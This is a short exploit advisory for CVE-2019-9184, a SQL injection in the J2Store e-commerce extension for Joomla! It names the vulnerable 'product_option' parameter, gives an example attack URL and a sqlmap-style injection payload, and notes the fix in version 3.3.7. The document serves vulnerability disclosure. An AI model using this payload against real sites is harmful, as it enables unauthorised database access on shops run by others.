ExploitFixes
Joomla! Component J2Store < 3.3.7 - SQL Injection 2019-02-28 15:05:12

# Exploit Title: J2Store Plugin for Joomla! < 3.3.6 - SQL Injection
# Date: 19/02/2019
# Author: Andrei Conache
# Twitter: @andrei_conache
# Contact: andrei.conache[at]protonmail.com
# Software Link: https://www.j2store.org
# Version: 3.x-3.3.6
# Tested on: Linux
# CVE: CVE-2019-9184


1. Description:
J2Store is the most popular shopping/e-commerce extension for Joomla!. The SQL Injection found allows any visitor to run arbitrary queries
on the website.


2. Proof of Concept:

- Parameter vulnerable: "product_option[j]" array (where j depends on entries)
- Example: [URL]/index.php?option=com_j2store&view=product&task=update&product_option[j]='">2&product_qty=1&product_id=XX&option=com_j2store&ajax=0&_=XXXXXXXXXX
- sqlmap: product_option[j]=(CASE WHEN (4862=4862) THEN 4862 ELSE 4862*(SELECT 4862 FROM DUAL UNION SELECT 5348 FROM DUAL) END)


3. Solution:
Update to 3.3.7